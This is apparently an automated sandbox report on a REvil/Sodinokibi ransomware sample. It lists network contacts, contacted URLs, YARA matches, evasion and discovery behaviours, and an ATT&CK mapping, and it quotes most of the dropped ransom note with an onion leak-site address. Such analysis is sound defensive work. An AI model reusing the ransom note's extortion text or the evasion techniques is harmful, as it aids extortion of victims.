          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/wlwmanifest.xml
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyoubysia.com.au%2F
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyoubysia.com.au%2F&#038;format=xm
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/xmlrpc.php?rsd
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au:443/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.gettimely.com/book
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.gettimely.com/giftvouchers/mobile
          Source: unknownHTTPS traffic detected: 185.2.4.64:443 -> 192.168.2.3:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 87.230.41.243:443 -> 192.168.2.3:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 166.62.110.232:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 74.220.215.94:443 -> 192.168.2.3:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.201.60.54:443 -> 192.168.2.3:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 66.155.35.240:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.72.5.145:443 -> 192.168.2.3:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.72.5.145:443 -> 192.168.2.3:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.175.106.113:443 -> 192.168.2.3:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.195.240.117:443 -> 192.168.2.3:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.46.91.28:443 -> 192.168.2.3:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.168.131.241:443 -> 192.168.2.3:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 136.243.147.81:443 -> 192.168.2.3:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.165.53.185:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.234.145.174:443 -> 192.168.2.3:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.234.145.174:443 -> 192.168.2.3:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.137.75.185:443 -> 192.168.2.3:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.107.227.241:443 -> 192.168.2.3:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.13:443 -> 192.168.2.3:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.139.128.10:443 -> 192.168.2.3:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 159.69.118.212:443 -> 192.168.2.3:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.98.131.150:443 -> 192.168.2.3:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 83.166.155.153:443 -> 192.168.2.3:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.93.110.250:443 -> 192.168.2.3:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 94.16.115.81:443 -> 192.168.2.3:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.221.46.9:443 -> 192.168.2.3:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 198.12.145.239:443 -> 192.168.2.3:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 144.76.225.204:443 -> 192.168.2.3:49770 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.29.252.113:443 -> 192.168.2.3:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 178.250.15.192:443 -> 192.168.2.3:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 155.133.142.13:443 -> 192.168.2.3:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.9.188:443 -> 192.168.2.3:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.26.13.9:443 -> 192.168.2.3:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.93.110.250:443 -> 192.168.2.3:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 46.30.215.215:443 -> 192.168.2.3:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.222.33:443 -> 192.168.2.3:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.90.53.15:443 -> 192.168.2.3:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.90.53.15:443 -> 192.168.2.3:49780 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.119.82.125:443 -> 192.168.2.3:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.119.82.125:443 -> 192.168.2.3:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.121.58.131:443 -> 192.168.2.3:49783 version: TLS 1.2
          Source: tS9P6wPz9x.exe, 00000000.00000002.596864356.0000000000B4A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: tS9P6wPz9x.exe, 00000000.00000003.391989730.0000000000BB5000.00000004.00000001.sdmp Binary or memory string: !F_WinAPI_RegisterRawInputDevices.au3a

          Spam, unwanted Advertisements and Ransom Demands:

          Found ransom note / readme
          Source: C:\4wfaj7427w-readme.txt Dropped file: ---=== Welcome. Again. ===------=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4wfaj7427w.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] Data leak [+]First of all we have uploaded more then 80 GB archived data from \\UDATA.Example of data:- Accounting- Finance- Personal Data- Banking data- Strategic sourcing- Management- projects, plans- Confidential filesAnd more other...Our blog:http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/Read what happens to those who do not pay.We are ready:- To provide you the evidence of stolen data- To give you universal decrypting tool for all encrypted files.- To delete all the stolen data.[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] Ho
          Yara detected Sodinokibi Ransomware
          Source: Yara match File source: 00000000.00000003.204386386.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204547357.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204201424.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204266101.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204328055.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204654521.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204504022.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.204445658.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: tS9P6wPz9x.exe PID: 2844, type: MEMORY
          Contains functionalty to change the wallpaper
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C453E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC, 0_2_009C453E
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Process Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C3B8E OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle, 0_2_009C3B8E
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009CB82A 0_2_009CB82A
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C865D 0_2_009C865D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009CAB95 0_2_009CAB95
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C8B80 0_2_009C8B80
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C83FF 0_2_009C83FF
          Source: tS9P6wPz9x.exe, 00000000.00000002.596771888.0000000000B30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe, 00000000.00000002.601804176.00000000029D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe, 00000000.00000002.601788644.00000000029C0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe, 00000000.00000002.599731233.0000000002520000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: tS9P6wPz9x.exe, type: SAMPLE Matched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 00000000.00000000.203907016.00000000009C1000.00000020.00020000.sdmp, type: MEMORY Matched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, type: MEMORY Matched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 0.2.tS9P6wPz9x.exe.9c0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 0.0.tS9P6wPz9x.exe.9c0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: classification engine Classification label: mal100.rans.evad.winEXE@2/2@46/38
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C4C0D GetDriveTypeW,GetDiskFreeSpaceExW, 0_2_009C4C0D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C53A4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW, 0_2_009C53A4
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\396F07EB-C2F1-6216-0EC9-D4DA87185DBF
          Source: tS9P6wPz9x.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: tS9P6wPz9x.exe, 00000000.00000003.368921886.0000000000BBC000.00000004.00000001.sdmp Binary or memory string: SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'k;R
          Source: tS9P6wPz9x.exe, 00000000.00000003.430958851.0000000000BBC000.00000004.00000001.sdmp Binary or memory string: SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'b;S
          Source: tS9P6wPz9x.exe Virustotal: Detection: 75%
          Source: unknown Process created: C:\Users\user\Desktop\tS9P6wPz9x.exe 'C:\Users\user\Desktop\tS9P6wPz9x.exe'
          Source: unknown Process created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: tS9P6wPz9x.exe Static PE information: section name: .cfg
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File created: C:\4wfaj7427w-readme.txt

          Malware Analysis System Evasion:

          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C5907 0_2_009C5907
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep graph_0-5168
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C585D rdtsc 0_2_009C585D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle, 0_2_009C3B8E
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Window / User API: threadDelayed 9999
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe TID: 2592 Thread sleep count: 9999 > 30
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C761A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose, 0_2_009C761A
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C5370 GetSystemInfo, 0_2_009C5370
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\NULL
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\manifest.json
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\win_x64
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\NULL
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\LICENSE
          Source: tS9P6wPz9x.exe, 00000000.00000003.459057587.0000000000C10000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW1
          Source: tS9P6wPz9x.exe, 00000000.00000003.459057587.0000000000C10000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
          Source: tS9P6wPz9x.exe, 00000000.00000002.596864356.0000000000B4A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0B
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe API call chain: ExitProcess graph end node graph_0-4252
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C585D rdtsc 0_2_009C585D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C5387 mov ecx, dword ptr fs:[00000030h] 0_2_009C5387
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C4FB9 mov eax, dword ptr fs:[00000030h] 0_2_009C4FB9
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C47AB HeapCreate,GetProcessHeap, 0_2_009C47AB
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe 0_2_009C4964
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C4A20 AllocateAndInitializeSid,SetEntriesInAclW,SetNamedSecurityInfoW, 0_2_009C4A20
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C4B58 cpuid 0_2_009C4B58
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe Code function: 0_2_009C505F GetUserNameW, 0_2_009C505F

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Replication Through Removable Media 1 | Windows Management Instrumentation 1 | Windows Service 1 | Windows Service 1 | Virtualization/Sandbox Evasion 1 | Input Capture 21 | Security Software Discovery 121 | Replication Through Removable Media 1 | Input Capture 21 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Defacement 1
          Default Accounts | Service Execution 1 | Boot or Logon Initialization Scripts | Process Injection 12 | Process Injection 12 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Process Discovery 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Proxy 1 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Peripheral Device Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Account Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Service Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | File and Directory Discovery 2 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Information Discovery 25 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          tS9P6wPz9x.exe | 76% | Virustotal |
          tS9P6wPz9x.exe | 100% | Avira | TR/Crypt.XPACK.Gen
          tS9P6wPz9x.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.0.tS9P6wPz9x.exe.9c0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          0.2.tS9P6wPz9x.exe.9c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          theduke.de | 2% | Virustotal |
          www.trulynolen.co.uk | 0% | Virustotal |
          365questions.org | 6% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://youbysia.com.au/wp-content/themes/youbysia/js/jquery.min.js?ver=1tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://open.spotify.com/episode/2z7qIfZlCzb04pemsS18kRtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    high
                                                                                                                    https://manifestinglab.com:443/news/tmp/pakc.jpgtS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://latribuessentielle.com/?s=tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.binder-buerotechnik.at/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.8tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://staging.you-bysia.com.au/about-us/#our-teamtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://narcert.com/uploads/image/burgajaobu.pngifhtS9P6wPz9x.exe, 00000000.00000003.468434175.0000000000B89000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://youbysia.com.au/by-skin-condition/dry-dehydrated-skin/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://you-by-sia.myshopify.com/products/starter-packtS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.cosbeauty.com.au/magazines/cosbeauty-magazine-88/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.trulynolen.co.uk/resources/truly-nolen-og.jpgtS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://youbysia.com.au/wp-content/uploads/2020/09/Sia-Hendry-podcast-LAser-Facial-Treatments.jpgtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://youbysia.com.au/wp-content/uploads/2020/07/1.jpgtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://r3.o.lencr.orgtS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://schema.org/BreadcrumbListtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://mailchi.mp/a586a5225aac/get-summer-ready-bodytS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                        high
                                                                                                                        https://youbysia.com.au/by-laser-treatment/skin-treatments/inside-out-peel/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://certs.starfieldtech.com/repository/0tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/css/special-slider.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.365questions.org/wp-content/plugins/cleantalk-spam-protect/js/apbct-public.min.js?ver=5.tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
